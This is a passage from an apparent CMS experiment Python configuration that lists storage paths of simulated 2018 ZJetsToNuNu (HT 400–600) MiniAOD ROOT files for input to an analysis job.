'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/18B1230F-4E4F-7743-B72D-10617395D9C6.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/18C09836-97A5-E044-8EAA-46EFE38EE248.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/18E2D29C-28D6-D145-9656-6E6A302CFEEC.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/1A00FEE7-4EFC-8F4E-8AEC-7784FA7DF7F4.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/1ACC1498-9404-A647-8BE4-BC12FD3DE7FB.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/1AF1CB9D-DE0C-454A-A5C3-F2A4B61E8D9B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/1BAAC84B-B84B-2944-8A6C-FF439433B42C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/1D25308E-4397-D94E-9941-FCBB91EE2067.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/1D287280-D67C-AB42-8D31-8DA0022847D7.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/1DDD06DE-EEF5-664B-80CB-5BD2499EF6D6.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/1DDE94D5-10F4-764C-8DE7-D34E96B6E318.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/1E2E9400-C88A-7F4D-BB21-A72EC3412242.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/1EC9D168-80FC-4847-BFC0-8D0A93812C06.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/2070BF72-2888-FC46-80D5-CC7127ADFAFD.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/25C224FE-2115-E24A-AD94-199A878A37AA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/25F1ACC5-2F8B-7F46-8ACB-10508C8D15FB.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/26B5D7DC-28F2-E94C-84B9-89283FCFD032.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/26C1EBE1-9274-C94D-99A7-BBE21D0EF210.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/26D57FB7-979B-C14C-858B-06927FB6044A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/27B9DF6F-9C5E-074E-9754-870D1FD74203.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/28437A0F-B5A6-1948-8026-512644A245E6.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/28BE85CA-9D96-BF4C-B5A4-B43C48C69794.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/296F69AA-B85A-544A-ABCF-AEDC4959844C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/2A3FB7E1-66FF-DD43-9482-41CF7673ABEC.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/2A83AE36-8CC2-1447-BF42-9B1799CAE4B0.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/2BA2A60C-59EF-2A41-B6EC-80B0C1F21F8B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/2C4B9969-C963-DD4D-8B96-83804F84F1ED.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/2CB9DA09-12DE-6640-A369-F837DD092489.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/2D2E635E-DBC8-8040-B788-CF1AB11C190F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/2E3BD640-4B9C-0146-B844-6AFADA6830F4.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/2FBC854C-E325-4341-AECA-598997915FF2.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/316763AE-0ED9-0943-9D12-29C42B82CA1E.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/31CD3DD0-D4A9-D24C-8FD8-E2053266B603.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/332A3C5E-E3E0-3242-B592-8B347D84E646.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/338EB71F-4006-104E-93A4-2706F29E13CF.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/34B65DB8-E462-4344-8320-42B8656B131D.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/34FD4CD6-5F30-CD49-BB54-0824CCF53AA6.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/36522013-C815-B143-A564-7FEE87F9553C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/36670C6E-95FC-174C-A735-DADA2A105705.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/36DAB7F0-6B51-6340-ADD2-2E8DC807F023.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/373B94D1-AF54-F849-93B1-11655C0819B5.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/38502967-3A71-D141-9890-78067EE5AB0B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/3A25795A-FAA7-EA44-8E2E-F537B5EA2EDF.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/3A9CF632-4029-7145-A58E-1E9081F181D0.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/3BCE5EC0-CAA1-8847-BFA1-71FFA539888A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/3BE8FBDA-E563-DA4E-BD73-191C316ED49B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/3DAE52BB-F7E8-B84F-AC27-AB17ADD36C20.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/3E079D76-0F3E-264C-91D8-9A8502027D17.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/400A522A-19AD-A74A-8BEF-DC23F474309B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/40165159-AC94-2547-9206-C049E0B572AA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/40B5AC06-9465-6443-8B7F-8D1593D1C700.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/41163EED-B113-F848-900A-FC1EB200FC10.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/428D52A2-FCCB-7C44-8B56-AD834083D54A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/42D7D071-0470-9245-BD1F-3EFD5848903C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/4426742B-D4F1-DC4E-907C-1B1D33C2F05A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/466826B3-609D-7F48-A23E-C16300732841.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/46B75CDA-EA31-4A44-9D8E-4F40A23193A9.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/47A04135-54A0-1445-BF4D-4F0775DDAA85.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/47E18523-788C-384C-AE0F-512437A2EDE6.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/4849A203-5D0B-A94B-B06E-235A3B9EF2AC.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/490A4EEB-86A9-1F4A-B752-10D1C9775B8A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/493E1F36-4EF6-764C-A0AD-2B4A70264173.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/4972445F-E07A-7D48-BD5A-6619FB413141.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/4AC79677-4133-7845-BCB0-9270EBDD420F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/4B33E9B7-B62A-F44F-AAB9-C4D857B1B844.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/4B521DD1-7D3C-D44E-A4E5-46CBC56DCA40.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/4C481D06-6699-4C4A-BC32-04AC1E6C02BA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/4E426DC1-1C67-DA43-BE2E-2818F324BD74.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/4FA71150-F4D7-9847-AE1E-D79997E60E55.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/4FD4AB94-516F-9D4A-8486-1D7D1B22C31A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/50CA57EC-F23F-A444-92C2-E4A20DF1A9DA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/51909116-539A-8145-A549-D2A6EC99598A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/51CC574E-453C-7D42-9B87-E9B7CD60F19A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/52215B16-DE48-CC4D-BAAD-787A8A4F62C8.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/53DA7072-B28C-3C40-9A13-BF4F8A45004C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/541C3F91-D2A0-E346-8861-78F155A18194.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/56D6FAD8-1330-A14C-8003-DE2E9A382CB6.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/574F080C-88D6-4C49-AD0A-4895EC537464.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/5ADDD027-96ED-124D-AED3-C95BD18F91CC.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/5AEAF952-0394-DF49-899B-D1C3CE495965.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/5C083167-53B4-4043-B506-C2D2BA13DED2.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/5DB3A6D8-D851-AA47-A0E8-E050C2B3BFCE.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/5DB5CABB-4220-274E-9CF4-C4931DCB4C3F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/5DE048E9-ED4C-C148-AA91-1043A89F7040.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/5E119A8E-07FE-924F-8CE7-1E060208C387.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/5E2FAD04-C8CA-3348-BD24-57274F850967.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/5FC253C2-1BF1-C542-A72A-4D7496C266D9.root',
] )
readFiles.extend( [
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/6027659F-DACB-774F-BFBB-2405F0606FC8.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/626BBFC3-00C4-DA4C-A23D-13E7D7DEB8EE.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/649445AA-DBEB-9A4C-AFB3-76058E56ADD8.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/64A7AE82-93B9-D24E-8937-E8C1F9BA84B1.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/64D7C129-09AA-3D4B-886D-21B4E6D1B5D1.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/656D90FE-8FAD-D34E-B919-C96EF3763627.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/6603A66A-55E0-E64E-80AF-95057C47986B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/67AAD2CA-7983-134B-8E33-475D900C047B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/6CD445FC-D3D0-4149-9CF1-B109749BAD25.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/6E0AA4AD-6AA4-DF49-A897-4FAB08AF4749.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/7155BAD1-5847-E348-9AD5-5063D7E1B622.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/71974EBE-3800-FF41-8C11-B42E3D33DBF9.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/77C1D89D-5202-6548-8565-9CF9F0797DD3.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/77DE401C-A3F3-3A4C-9EB2-508891707BFD.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/785F8825-FDDE-A34E-B0BF-C435CD740CD8.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/79F9F9B3-09F3-8F4F-89E2-65B0936453A7.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/7A07F23E-683A-5A46-BC72-73AB728A755F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/7A45290A-D464-B040-8255-D57002D45F2F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/7C5CBDC0-9E56-1046-A52D-1CAA57C5ACBB.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/7CF55AD5-36CC-4140-969D-5FB68C4C4FFA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/7E2CC139-3B2C-C644-8351-AD6A209C1D13.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/7F041144-6CCD-A941-956D-7E8645178595.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/7F5EE1A4-0915-4147-8AC6-B9361520C053.root',
